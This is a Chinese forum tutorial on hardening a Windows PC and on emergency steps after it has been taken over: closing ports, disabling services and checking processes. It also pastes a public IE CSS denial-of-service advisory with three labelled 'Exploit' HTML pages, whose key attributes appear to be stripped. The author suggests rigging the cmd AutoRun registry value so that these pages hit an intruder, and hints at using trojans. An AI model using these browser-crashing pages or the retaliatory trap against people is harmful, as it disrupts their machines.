防御黑客和被當做肉雞后的緊急處理
03月07日 17:27 作者:
不滅的神話防御黑客和被當做肉雞后的緊急處理
大家好,好久沒做教程了。大家好 我是黑吧lius QQ 誰無虎落平陽
今天給大家講下怎么防御黑客和被當做肉雞后的緊急處理
首先說下怎么緊急處理
1。在成為別人肉雞后的緊急處理辦法
原理:黑客慣用cmd 打開cmd時我們可以搞些設置 具體請打開注冊表 如果對方打開cmd想搞東西 我們就可以利用這個別人搞我們的程序 反過去搞別人 看操作
打開 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor 我就不具體打開了 路徑都告訴大家了
找到AutoRun 這個,AutoRun 修改這 我以C盤做例子 好 我們再試下開cmd 再給大家演示下 是吧 只要不關閉cmd就一直跳出我們設置的1.htm嚇人吧
就會出來我們的頁面吧 我這有幾個IE CSS畸形寬度單元標記拒絕服務漏洞 我已經(jīng)給大家復制過來了 看
系統(tǒng)編號:BES200612758
危害級別:★★★☆☆☆
影響版本:
Microsoft Internet Explorer 7.0
Microsoft Internet Explorer 7 Beta 2
Microsoft Internet Explorer 7 Beta 1
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
詳細說明:
Internet Explorer是微軟發(fā)布的非常流行的WEB瀏覽器。
Internet Explorer在處理畸形的HTML標記時存在漏洞,遠程攻擊者可能利用此漏洞導致用戶機器不可用。
如果用戶使用IE訪問了設置有特制CSS寬度單元的WEB頁面的話,就會導致iexplore.exe耗盡100%的CPU資源。
參考:
José_Carlos_Nieto_Jarquín (
xiam.core@gmail.com)
Andrius Paurys (
andrius.paurys@gmail.com)
鏈接:
http://marc.theaimsgroup.com/?l=bugtraq&m=116542162532025&w=2解決方案:
http://www.microsoft.com/windows/ie/default.asp程序代碼
<html>
<head>
<title>Another non-standards compliant IE D.O.S.</title>
</head>
<body>
<div >
<table >
<tr><td></td></tr>
</table>
</div>
Written by <a href="
sky.http://www.skylw.cn">sky</a>.<br />
Tested under IE 6.0.2900.2180
</body>
</html>
(IE會阻止頁面彈出,允許彈出的話IE會占去大部分的資源,造成IE自定死掉.對自己電腦沒有信心的勿試,可能死機)
Exploit 2
程序代碼
<html>
<head>
<title>Another non-standards compliant IE D.O.S.</title>
</head>
<body>
<div >
<table >
<tr><td></td></tr>
</table>
</div>
Written by <a href="
sky.http://www.skylw.cn">sky</a>.<br />
Tested under IE 6.0.2900.2180
</body>
</html>
(這個代碼的效果沒有第一個那么可怕,只是會彈出5個頁面)
Exploit 3
程序代碼
<html>
<head>
<title>Another non-standards compliant IE D.O.S.</title>
</head>
<body>
<div >
<table >
<tr>
<td>
測試.測試.
</td>
</tr>
</table>
</div>
Written by <a href="
sky.http://www.skylw.cn">sky</a>.<br />
Tested under IE 6.0.2900.2180
</body>
</html>
(這個代碼的效果沒有第一個那么可怕,和第二個一樣只是會彈出5個頁面)
如果做成網(wǎng)頁 還設置成1.htm就完了 我自己電腦是不敢測試 上次已經(jīng)試過了 搞的我死機了
這可以發(fā)散下 我們可以弄自己的木馬等等 具體就不能再教了 時間限制嘛 再說我技術也不行嘿嘿
下面給大家將下iexplore.exe是進程還是病毒 問題
2。iexplore.exe是進程還是病毒 問題
iexplore.exe是Microsoft Internet Explorer的主程序。這個微軟Windows應用程序讓你在網(wǎng)上沖浪,和訪問本地Interanet網(wǎng)絡。這不是純粹的系統(tǒng)程序,但是如果終止它,可能會導致不可知的問題。iexplore.exe同時也是Avant網(wǎng)絡瀏覽器的一部分,這是一個免費的基于Internet Explorer的瀏覽器。注意iexplore.exe也有可能是Trojan.KillAV.B病毒,該病毒會終止你的反病毒軟件,和一些Windows系統(tǒng)工具,該進程的安全等級是建議刪除。
這個東西可以說是病毒,也可以說不是病毒。 大家得仔細看進程了不要被蒙騙 但也不要亂關 看我演示下
先讓大家看下我沒有iexplore.exe 沒有吧 我們現(xiàn)在再開啟 看 有了吧 就是我剛開的 好了這個問題我寫的很詳細了
接下來快速看下關閉幾個危險的端口
3。關閉危險的端口 135.139.445等 寫很詳細我就不多演示了 很簡單的
A.刪除ipc$空連接
在運行內(nèi)輸入regedit,在注冊表中找到 HKEY-LOCAL_MACHINE→SYSTEM→CurrentControSet→Control→LSA項里
數(shù)值名稱RestrictAnonymous的數(shù)值數(shù)據(jù)由0改為1。
B.135端口的關閉
HKEY_LOCAL_MACHINE→SOFTWARE→Microsoft→Ole→EnableDCOM的值改為“N”
HKEY_LOCAL_MACHINE→SOFTWARE→Microsoft→Rpc→DCOM Protocols 中刪除“ncacn_ip_tcp”
此外,還需要停用“Distributed Transaction Coordinator”服務。
C.139端口的關閉
在“網(wǎng)絡和撥號連接”中“本地連接”中選取“Internet協(xié)議(TCP/IP)”屬性,進入“高級TCP/IP設置”
“WinS設置”里面有一項“禁用TCP/IP的NETBIOS”,打勾
D.445端口的關閉
HKEY_LOCAL_MACHINE→System→CurrentControlSet→Services→NetBT→Parameters
建立一個SMBDeviceEnabled 為REG_DWORD類型鍵值為0
最后為大家送上禁止一些危險的服務
4。禁止一些危險的服務
大家去下管理就可以 一個個對下去設置 OK了
1.Alerter[通知選定的用戶和計算機管理警報]
2.ClipBook[啟用“剪貼簿查看器”儲存信息并與遠程計算機共享]
3.Distributed File System[將分散的文件共享合并成一個邏輯名稱,共享出去,關閉后遠程計算機無法訪問共享
4.Distributed Link Tracking Server[適用局域網(wǎng)分布式鏈接]
5.Indexing Service[提供本地或遠程計算機上文件的索引內(nèi)容和屬性,泄露信息]
6.Messenger[警報]
7.NetMeeting Remote Desktop Sharing[netmeeting公司留下的客戶信息收集]
8.Network DDE[為在同一臺計算機或不同計算機上運行的程序提供動態(tài)數(shù)據(jù)交換]
9.Network DDE DSDM[管理動態(tài)數(shù)據(jù)交換 (DDE) 網(wǎng)絡共享]
10.Remote Desktop Help Session Manager[管理并控制遠程協(xié)助]
11.Remote Registry[使遠程計算機用戶修改本地注冊表]
12.Routing and Remote Access[在局域網(wǎng)和廣域往提供路由服務.黑客理由路由服務刺探注冊信息]
13.Server[支持此計算機通過網(wǎng)絡的文件、打印、和命名管道共享]
14.TCP/IPNetBIOS Helper[提供 TCP/IP 服務上的 NetBIOS 和網(wǎng)絡上客戶端的 NetBIOS 名稱解析的支持而使用戶能夠共享文件、打印和登錄到網(wǎng)絡]
15.Telnet[允許遠程用戶登錄到此計算機并運行程序]
16.Terminal Services[允許用戶以交互方式連接到遠程計算機]
17.Window s Image Acquisition (WIA)[照相服務,應用與數(shù)碼攝象機]